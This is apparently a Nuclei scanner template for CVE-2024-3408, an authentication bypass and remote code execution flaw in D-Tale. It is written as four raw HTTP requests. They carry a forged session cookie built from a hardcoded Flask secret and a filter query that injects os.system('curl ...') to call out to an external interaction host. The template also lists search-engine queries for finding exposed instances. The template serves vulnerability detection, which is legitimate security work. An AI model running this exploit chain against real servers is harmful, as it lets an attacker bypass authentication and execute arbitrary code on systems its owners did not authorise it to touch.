id: CVE-2024-3408 info: name: D-Tale 3.10.0 - 3.15.1 - Authentication Bypass & Remote Code Execution author: ohmygod20260203 severity: critical description: | man-group/dtale 3.10.0 contains an authentication bypass and remote code execution caused by improper input validation and a hardcoded SECRET_KEY in Flask configuration, letting attackers forge session cookies and execute arbitrary code, exploit requires attacker to access the application. impact: | Attackers can bypass authentication and execute arbitrary code on the server, leading to full system compromise. remediation: | Update to the latest version where the vulnerability is fixed or remove hardcoded SECRET_KEY and implement proper input validation. reference: - https://huntr.com/bounties/57a06666-ff85-4577-af19-f3dfb7b02f91 - https://github.com/man-group/dtale/commit/32bd6fb4a63de779ff1e51823a456865ea3cbd13 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2024-3408 cwe-id: CWE-94,CWE-798 epss-score: 0.91737 epss-percentile: 0.99701 metadata: verified: true max-request: 4 vendor: man-group product: dtale shodan-query: title:"D-Tale" fofa-query: title="D-Tale" tags: cve,cve2024,dtale,rce,auth-bypass,code-injection,man-group,intrusive,vkev variables: session_cookie: "eyJsb2dnZWRfaW4iOnRydWUsInVzZXJuYW1lIjoibnVjbGVpIn0.aYJDsw.w3AZyplKpvDzuqV5CJIsYdRbKYg" flow: http(1) && http(2) && http(3) && http(4) http: - raw: - | GET /dtale/popup/upload HTTP/1.1 Host: {{Hostname}} Cookie: session={{session_cookie}} matchers-condition: and matchers: - type: word internal: true words: - "D-Tale" - type: status internal: true status: - 200 extractors: - type: regex name: version group: 1 regex: - 'id="version"\s+value="([^"]+)"' - raw: - | POST /dtale/upload HTTP/1.1 Host: {{Hostname}} Cookie: session={{session_cookie}} Content-Type: multipart/form-data; boundary=----nucleiboundary ------nucleiboundary Content-Disposition: form-data; name="test.csv"; filename="test.csv" Content-Type: text/csv a,b 1,2 ------nucleiboundary Content-Disposition: form-data; name="header" true ------nucleiboundary Content-Disposition: form-data; name="separatorType" comma ------nucleiboundary Content-Disposition: form-data; name="separator" ------nucleiboundary-- matchers-condition: and matchers: - type: word internal: true words: - "data_id" - "success" condition: and - type: status internal: true status: - 200 extractors: - type: regex name: data_id internal: true group: 1 regex: - '"data_id"\s*:\s*"?(\d+)"?' - raw: - | GET /dtale/update-settings/{{data_id}}?settings=%7B%22enable_custom_filters%22%3Atrue%7D HTTP/1.1 Host: {{Hostname}} Cookie: session={{session_cookie}} matchers-condition: and matchers: - type: word internal: true words: - '"success"' - type: status internal: true status: - 200 - raw: - | GET /dtale/test-filter/{{data_id}}?query=%40pd.core.frame.com.builtins.__import__(%27os%27).system(%27curl+{{interactsh-url}}%27)&save=true HTTP/1.1 Host: {{Hostname}} Cookie: session={{session_cookie}} matchers-condition: and matchers: - type: word part: interactsh_protocol words: - "http" - "dns" condition: or - type: status status: - 200 # digest: 490a0046304402206c41c4de0cd04450dd0e1c8b7d389ce5f47862f3c6408af999f3798de493aed30220546a43e85d9474bf60ad0897fbb11f97e63f90f0c03d72156d6eb1d5cd1714e0:922c64590222798bb761d5b6d8e72950